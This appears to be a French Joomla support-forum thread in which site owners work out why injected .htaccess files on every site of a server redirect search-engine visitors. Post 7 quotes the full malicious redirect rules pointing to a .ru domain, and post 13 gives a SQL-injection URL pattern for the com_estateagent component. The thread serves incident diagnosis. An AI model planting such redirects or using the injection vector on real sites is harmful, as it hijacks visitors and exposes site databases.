Htaccess piraté sur tous les sites du serveur

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] Htaccess piraté sur tous les sites du serveur

    Bonjour,

    J'ai un énorme souci, je suis épuisé, si quelqu’un a une idée pour m'aiguiller :

    Absolument tous les sites d'un de mes serveur on été hackés par injection de htaccess, pour rediriger les visiteur arrivant depuis les moteurs de recherche. L’accès direct reste fonctionnel.

    Des htaccess sont positionnés partout, même sur les virtual host sans cms (pour du ftp) donc sans script. Certains sont même placé en amont de la racine.

    Crawlprotect ne change rien au problème, je suis un peu désespéré.

    J'ai le bckup de tous les sites, j'aimerais chercher un tache cron ou autres script qui systématiquement ajoute ou modifies mes htaccess. Une idée ?

    Depuis trois jours je ne m'en sors pas, une 15 de sites sont hs

    Merci,

  • #2
    Re : Htaccess piraté sur tous les sites du serveur

    Bonjour,

    Il faudrait déjà savoir par ou ils sont passés, analyse les logs du serveur. Ensuite modifier tous les mots de passe, j'ai bien dit tous( serveru, mysql, ftp, clients etc.

    Ensuite et sans être méchant, quand on gère 15 sites on s'oriente vers du Pro et donc tu devrais avoir les acquis pour gérer ces situations ou alors sous-traiter l'infogérance.

    Commentaire


    • #3
      Re : Htaccess piraté sur tous les sites du serveur

      Re,

      C'est ce que je recherche, par ou ça passe.

      Effectivement, nous sous traitons cette lourde tache, nous avons déjà changé tous les mots de passe. J'aimerais scanner tout le bckup afin de trouver la faille, mais sur quel mots clés ?

      Sinon, je pense remettre les sites un par un sur un nouveau serveur

      Commentaire


      • #4
        Re : Htaccess piraté sur tous les sites du serveur

        Sinon, je pense remettre les sites un par un sur un nouveau serveur
        C'est une solution, parce que si l'infogérance du serveur et donc les mises à jour s'y rapportant ne sont pas faites c'est sur que là c'est du pain béni pour les malveillants.

        Commentaire


        • #5
          Re : Htaccess piraté sur tous les sites du serveur

          Envoyé par zepelin57 Voir le message
          C'est une solution, parce que si l'infogérance du serveur et donc les mises à jour s'y rapportant ne sont pas faites c'est sur que là c'est du pain béni pour les malveillants.
          Bonjour,

          Quand tous les sites d'un même serveur sont crackés simultanément, CrawlProtect ou autre outil n'y pourra pas grand chose.
          Il est fort probable que sur ce serveur il s'agisse d'une version de PHP n'ayant pas reçu les patches de sécurité pour combler la faille PHP-CGI qui permet à un attaquant, d'obtenir des droits très étendus, et donc de parasiter tous les sites, tout en insérant un oeuf de coucou directement dans les fichiers apache, pour réactiver les modifications .htaccess si on les nettoie.

          Attention, une infogérance avec vraie maintenance sécurité est assez coûteuse.
          Pas de demande de support par MP.
          S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

          Commentaire


          • #6
            Re : Htaccess piraté sur tous les sites du serveur

            Re,
            Merci pour votre soutient,
            Je suis sur une solution Cloud, je n'ai pas pas accès aux fichiers de conf du serveur, le prestataire est connu et fiable, je l'ai averti des la connaissance du problème.

            Dois je me diriger vers un souci hébergement donc, ou une faille joomla (composant, module, plugin ...).

            Comment trouver le coucou ? ;-)

            Commentaire


            • #7
              Re : Htaccess piraté sur tous les sites du serveur

              Le htaccess :
              Code:
              <IfModule mod_rewrite.c>
              RewriteEngine On
              RewriteCond %{HTTP_REFERER} ^.*
              google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|netscape|aol|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|liveinternet|filesearch|yell|openstat|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace)\.(.*)
              
              RewriteRule ^(.*)$ [url]site.ru[/url] [R=301,L]
              RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														
              																														RewriteRule ^(.*)$ [url]site.ru[/url] [R=301,L]																														
              																														</IfModule>
              Cas similaire sur wordpress, je n'arrive pas sur joomla à trouver le fichier

              Commentaire


              • #8
                Re : Htaccess piraté sur tous les sites du serveur

                C'est typique des infections .htaccess, pas uniquement Joomla!, mais de tout système ayant un PHP en mode CGI, sans les patches corrigeant la faille de ce mode de PHP.
                Pas de demande de support par MP.
                S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                Commentaire


                • #9
                  Re : Htaccess piraté sur tous les sites du serveur

                  Envoyé par jisse03 Voir le message
                  C'est typique des infections .htaccess, pas uniquement Joomla!, mais de tout système ayant un PHP en mode CGI, sans les patches corrigeant la faille de ce mode de PHP.
                  Re,
                  Oui mais alors pourquoi tous les serveurs ne sont pas touchés ?

                  Commentaire


                  • #10
                    Re : Htaccess piraté sur tous les sites du serveur

                    Tout simplement parce que les attaques se font par une IP, et pas par plage IP.
                    Pas de demande de support par MP.
                    S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                    Commentaire


                    • #11
                      Re : Htaccess piraté sur tous les sites du serveur

                      Envoyé par jisse03 Voir le message
                      Tout simplement parce que les attaques se font par une IP, et pas par plage IP.
                      Re,
                      Je veux bien qu'il y ait des failles sur les CMS, mais est t-il possible de placer un fichier htaccess hors du virtual host ?

                      Je souhaiterais que le prestataire assume quelque peu ses responsabilités. Un virtual host qui ne servait qu'a du ftp, sans aucun script, avait été contaminé par un htaccess.

                      Je ne sais toujours pas d'ou vient l'intrusion, mais si comme vous dites un patch CGI de sécurité manquait, comment vérifier ?

                      Commentaire


                      • #12
                        Re : Htaccess piraté sur tous les sites du serveur

                        Je veux bien qu'il y ait des failles sur les CMS, mais est t-il possible de placer un fichier htaccess hors du virtual host ?
                        Non, un .htaccess ets lié à un host ou VHost, et uniquement à ce host.

                        Un virtual host qui ne servait qu'a du ftp, sans aucun script, avait été contaminé par un htaccess.
                        Quelle que soit son utilisation, un VHost reste un VHost, son utilisation ne change rien au paramétrage des VHosts Apache et de son acceptation ou pas de PHP, Perl, etc, ni du mode (mod_php, php-cgi, fcgi, suPHP, etc...)

                        Je ne sais toujours pas d'ou vient l'intrusion, mais si comme vous dites un patch CGI de sécurité manquait, comment vérifier ?
                        Là, sans pouvoir auditer complètement le serveur, tester les divers cas de failles possibles au niveau Apache, PHP, Perl, la présence ou non de Suhosin, etc, il est impossible de vrérifier et tracer l'origine du problème.
                        Pas de demande de support par MP.
                        S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                        Commentaire


                        • #13
                          Re : Htaccess piraté sur tous les sites du serveur

                          Bonjour,

                          Je pense avoir isolé le site qui posait souci, il s'agit d'une version composant immobilier :

                          Code:
                          http://site.com/index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
                          Sur joomla 1.5.

                          Merci

                          Commentaire


                          • #14
                            Re : Htaccess piraté sur tous les sites du serveur

                            Salut jisse, salut zeplin, ça fait plaisir de vous retrouver sur le forum
                            Je me permet d'ajouter une rallonge à ce poste, un de mes client viens d'avoir le même coups sous Joomla 1.5 (sans le composant estateagent). Il est vrai que l'hébergeur n'est pas spécialement connu pour sa fiabilité (PHPNET.org), il me demande d'ailleurs de trouver la faille et je n'ai accès à aucun log ...
                            Artisan du Web - développeur d'application web et de site internet essentiellement avec Joomla www.incode.be
                            - Le sujet est [Réglé] et on n'en parle plus ? Modifier le statut de votre message svp
                            - Communauté Joomla Belge sur Facebook

                            Commentaire


                            • #15
                              Re : Htaccess piraté sur tous les sites du serveur

                              Envoyé par wworld Voir le message
                              Salut jisse, salut zeplin, ça fait plaisir de vous retrouver sur le forum
                              Je me permet d'ajouter une rallonge à ce poste, un de mes client viens d'avoir le même coups sous Joomla 1.5 (sans le composant estateagent). Il est vrai que l'hébergeur n'est pas spécialement connu pour sa fiabilité (PHPNET.org), il me demande d'ailleurs de trouver la faille et je n'ai accès à aucun log ...
                              Hello,

                              Sans aucun log disponible, tu vas devoir te rabattre sur le pendule, le chapelet, les gousses d'ail et pieu, ou encore sur une boule de cristal ou les entrailles d'un poulet

                              Plus sérieusement, parvenir à tracer la véritable origine d'un crack de site (une fois éliminées les failles des scripts PHP, extensions vulnérables...) n'est pas de tout repos, et se révèle coûteux en temps (donc en ferrailles sonnantes et trébuchantes pour le client).

                              Mais y parvenir sans aucun log, autant demander un acte de propriété concernant la Lune, Mars et Jupiter simultanément.

                              Pour te donner un exemple, pour un de mes clients, il a fallu 12 jours d'investigations dans les logs systèmes de 90 jours pour trouver une faille dans le firewall du serveur, qui avait servi de point d'entrée...
                              Pas de demande de support par MP.
                              S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                              Commentaire

                              Annonce

                              Réduire
                              Aucune annonce pour le moment.

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X